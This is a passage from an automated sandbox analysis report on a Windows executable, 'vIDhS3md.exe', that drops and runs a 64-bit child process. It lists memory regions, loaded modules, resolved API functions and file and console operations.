| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x74730000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x773f0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x74731580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x74731500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x74731560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:08:35 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #151: vidhs3md64.exe
66
0
| Information | Value |
|---|---|
| ID | #151 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:57, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcc4 |
| Parent PID | 0xc74 (c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CC8
0x
CCC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00180000 | 0x0023dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00246fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00250fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0035ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0045ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000460000 | 0x00460000 | 0x005e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| imm32.dll | 0x005f0000 | 0x00623fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x005f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000630000 | 0x00630000 | 0x007b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007c0000 | 0x007c0000 | 0x01bbffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001bc0000 | 0x01bc0000 | 0x01c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fc57000 | 0x7fc57000 | 0x7fc57fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| vidhs3md64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff6000 | 0x7ff5ffff6000 | 0x7ff5ffff6fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffae5c40000 | 0x7ffae5ce9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffaf7930000 | 0x7ffaf7a07fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
